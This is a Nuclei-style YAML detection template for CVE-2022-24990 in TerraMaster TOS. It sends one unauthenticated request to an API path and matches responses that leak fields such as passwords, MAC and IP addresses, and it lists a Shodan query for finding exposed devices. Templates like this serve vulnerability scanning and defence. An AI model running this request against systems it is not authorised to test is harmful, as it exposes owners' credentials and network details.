58 lines
2.0 KiB
YAML
58 lines
2.0 KiB
YAML
id: CVE-2022-24990
|
|
|
|
info:
|
|
name: TerraMaster TOS < 4.2.30 Server Information Disclosure
|
|
author: dwisiswant0
|
|
severity: high
|
|
description: TerraMaster NAS devices running TOS prior to version 4.2.30 are vulnerable to information disclosure.
|
|
remediation: |
|
|
Upgrade the TerraMaster TOS server to version 4.2.30 or later to mitigate the vulnerability.
|
|
reference:
|
|
- https://octagon.net/blog/2022/03/07/cve-2022-24990-terrmaster-tos-unauthenticated-remote-command-execution-via-php-object-instantiation/
|
|
- https://www.broadcom.com/support/security-center/attacksignatures/detail?asid=33732
|
|
- https://forum.terra-master.com/en/viewforum.php?f=28
|
|
- http://packetstormsecurity.com/files/172904/TerraMaster-TOS-4.2.29-Remote-Code-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-24990
|
|
cwe-id: CWE-306
|
|
epss-score: 0.93762
|
|
epss-percentile: 0.98854
|
|
cpe: cpe:2.3:o:terra-master:terramaster_operating_system:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: terra-master
|
|
product: terramaster_operating_system
|
|
shodan-query: "TerraMaster"
|
|
tags: packetstorm,cve,cve2022,terramaster,exposure,kev
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/module/api.php?mobile/webNasIPS"
|
|
|
|
headers:
|
|
User-Agent: "TNAS"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "application/json"
|
|
- "TerraMaster"
|
|
condition: and
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "webNasIPS successful"
|
|
- "(ADDR|(IFC|PWD|[DS]AT)):"
|
|
- "\"((firmware|(version|ma(sk|c)|port|url|ip))|hostname)\":"
|
|
condition: or
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a00483046022100b948043ddde4b9c8b5f06961978e963ed426969387b487d3eb844cd824414d28022100853be99850fff6dc04c3e836b3d7618159e74b0756ea7e99b5d9b5b5cdf556e7:922c64590222798bb761d5b6d8e72950 |